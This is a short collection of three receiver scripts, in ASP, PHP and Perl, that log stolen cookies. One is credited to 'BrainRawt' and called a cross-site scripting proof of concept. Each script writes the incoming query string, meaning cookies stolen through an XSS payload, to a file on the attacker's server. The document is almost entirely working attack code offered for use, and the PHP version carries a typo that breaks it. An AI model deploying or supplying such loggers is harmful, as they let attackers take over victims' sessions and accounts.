ASP版
dim strfilename
strfilename = "mydata.txt" 数据文件存放目录
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>
PHP版
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."
");
fclose($fp);
}
?>
PERL版
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
$borrowed_info = $ENV{QUERY_STRING};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html
something went wrong
";
print EVIL_COOKIE_LOG "$borrowed_info
";
print "Content-type: text/html
";
close(EVIL_COOKIE_LOG);
